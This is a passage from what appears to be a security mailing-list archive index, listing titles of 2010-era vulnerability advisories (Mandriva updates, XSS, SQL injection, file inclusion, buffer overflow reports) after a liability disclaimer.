at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

[ MDVSA-2010:154 ] cabextract

CVE-2010-3014: Coda Filesystem Kernel Memory Disclosure

[USN-971-1] OpenJDK vulnerabilities

[ MDVSA-2010:153 ] apache

[ MDVSA-2010:152 ] apache

XSS vulnerability in CMSimple

Xilisoft Video Converter Wizard 3 ogg file processing DoS

XSS vulnerability in CMSimple

XSRF (CSRF) in CMSimple

XSS vulnerability in pimcore

[ MDVSA-2010:151 ] libmikmod

Re: Re: Amblog 1.0 Joomla Component Multiple SQL Injection Vulnerabilities

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability

Insecure secure cookie in Tornado

Re: XSS vulnerability in Eden Platform

Re: XSS vulnerability in Theeta CMS

Re: XSS vulnerability in WebPress

Re: XSS vulnerability in CruxCMS

[ MDVSA-2010:150 ] libsndfile

Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow

ACollab Multiple Vulnerabilities

iDefense Security Advisory 08.10.10: Microsoft Office RTF Parsing Engine Memory Corruption Vulnerability

22 matches

Site Navigation

Mail list logo

Footer information